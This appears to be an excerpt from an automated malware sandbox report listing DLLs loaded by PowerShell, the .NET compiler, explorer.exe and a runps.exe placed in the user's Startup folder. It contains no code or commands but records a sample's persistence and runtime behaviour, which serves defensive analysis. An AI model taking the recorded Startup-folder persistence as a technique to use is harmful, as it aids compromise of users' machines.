        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: winhttpcom.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: ninput.dll
        Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
        Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\explorer.exeSection loaded: slc.dll
        Source: C:\Windows\explorer.exeSection loaded: sppc.dll
        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
        Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\explorer.exeSection loaded: idstore.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
        Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
        Source: C:\Windows\explorer.exeSection loaded: samcli.dll
        Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
        Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: winsta.dll
        Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
        Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
        Source: C:\Windows\explorer.exeSection loaded: devobj.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
        Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
        Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
        Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
        Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
        Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
        Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
        Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
        Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
        Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
        Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
        Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
        Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
        Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
        Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
        Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
        Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
        Source: C:\Windows\explorer.exeSection loaded: appextension.dll
        Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
        Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
        Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
        Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
        Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
        Source: C:\Windows\explorer.exeSection loaded: wincorlib.dll
        Source: C:\Windows\explorer.exeSection loaded: cdp.dll
        Source: C:\Windows\explorer.exeSection loaded: dsreg.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dll
        Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dll
        Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
        Source: C:\Windows\explorer.exeSection loaded: thumbcache.dll
        Source: C:\Windows\explorer.exeSection loaded: edputil.dll
        Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dll
        Source: C:\Windows\explorer.exeSection loaded: ntshrui.dll
        Source: C:\Windows\explorer.exeSection loaded: cscapi.dll
        Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
        Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dll
        Source: C:\Windows\explorer.exeSection loaded: cscui.dll
        Source: C:\Windows\explorer.exeSection loaded: provsvc.dll
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.dll
        Source: C:\Windows\explorer.exeSection loaded: pdh.dll
        Source: C:\Windows\explorer.exeSection loaded: applicationframe.dll
        Source: C:\Windows\explorer.exeSection loaded: stobject.dll
        Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dll
        Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\explorer.exeSection loaded: rmclient.dll
        Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dll
        Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dll
        Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dll
        Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dll
        Source: C:\Windows\explorer.exeSection loaded: npsm.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.web.dll
        Source: C:\Windows\explorer.exeSection loaded: mscms.dll
        Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dll
